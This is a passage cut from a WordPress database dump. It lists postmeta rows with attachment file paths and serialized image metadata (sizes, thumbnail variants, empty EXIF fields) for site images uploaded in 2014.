6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1145,1988,'_wp_attached_file','2014/06/71-1.jpg'),(1146,1988,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:16:\"2014/06/71-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"71-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1147,1989,'_wp_attached_file','2014/06/311-1.jpg'),(1148,1989,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/311-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"311-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1149,1990,'_wp_attached_file','2014/06/111-1.jpg'),(1150,1990,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/111-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"111-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1151,1991,'_wp_attached_file','2014/06/321-1.jpg'),(1152,1991,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/321-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"321-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1153,1992,'_wp_attached_file','2014/06/411-1.jpg'),(1154,1992,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/411-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"411-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1155,1993,'_wp_attached_file','2014/06/511-1.jpg'),(1156,1993,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/511-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"511-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1157,1994,'_wp_attached_file','2014/07/slidebg4-1.jpg'),(1158,1994,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2014/07/slidebg4-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slidebg4-1-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slidebg4-1-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"slidebg4-1-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slidebg4-1-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:23:\"slidebg4-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:22:\"slidebg4-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1159,1995,'_wp_attached_file','2014/07/slidebg22-1.jpg'),(1160,1995,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:23:\"2014/07/slidebg22-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slidebg22-1-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"slidebg22-1-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"slidebg22-1-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"slidebg22-1-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"slidebg22-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"slidebg22-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1161,1996,'_wp_attached_file','2014/06/611-1.jpg'),(1162,1996,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:130;s:4:\"file\";s:17:\"2014/06/611-1.jpg\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"611-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1163,1997,'_wp_attached_file','2014/07/logo-dark1-1.png'),(1164,1997,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:166;s:6:\"height\";i:70;s:4:\"file\";s:24:\"2014/07/logo-dark1-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"logo-dark1-1-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"logo-dark1-1-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1165,1998,'_wp_attached_file','2014/07/logo7-1.png'),(1166,1998,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:166;s:6:\"height\";i:70;s:4:\"file\";s:19:\"2014/07/logo7-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"logo7-1-150x70.png\";s:5:\"width\";i:150;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"logo7-1-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1167,1999,'_wp_attached_file','2014/06/mac1-1.png'),(1168,1999,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:532;s:6:\"height\";i:443;s:4:\"file\";s:18:\"2014/06/mac1-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"mac1-1-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"mac1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"mac1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:18:\"mac1-1-532x380.png\";s:5:\"width\";i:532;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:18:\"mac1-1-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:18:\"mac1-1-450x375.png\";s:5:\"width\";i:450;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:18:\"mac1-1-450x443.png\";s:5:\"width\";i:450;s:6:\"height\";i:443;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1169,2000,'_wp_attached_file','2014/06/features-iphone1-1.png'),(1170,2000,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:426;s:6:\"height\";i:578;s:4:\"file\";s:30:\"2014/06/features-iphone1-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-426x500.png\";s:5:\"width\";i:426;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-426x380.png\";s:5:\"width\";i:426;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-426x350.png\";s:5:\"width\";i:426;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"features-iphone1-1-426x450.png\";s:5:\"width\";i:426;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1171,2001,'_wp_attached_file','2014/07/nonslidebg21-1.jpg'),(1172,2001,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:26:\"2014/07/nonslidebg21-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"nonslidebg21-1-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"nonslidebg21-1-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"nonslidebg21-1-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:27:\"nonslidebg21-1-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:27:\"nonslidebg21-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:26:\"nonslidebg21-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1173,2002,'_wp_attached_file','2014/07/slidebg5-1.jpg'),(1174,2002,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2014/07/slidebg5-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slidebg5-1-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slidebg5-1-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"slidebg5-1-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slidebg5-1-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:23:\"slidebg5-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-880x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:22:\"slidebg5-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1175,2003,'_wp_attached_file','2014/07/slidebg23-1.jpg'),(1176,2003,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:610;s:4:\"file\";s:23:\"2014/07/slidebg23-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slidebg23-1-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"slidebg23-1-1024x325.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:325;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-768x244.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"slidebg23-1-1536x488.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"slidebg23-1-1670x531.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"slidebg23-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-8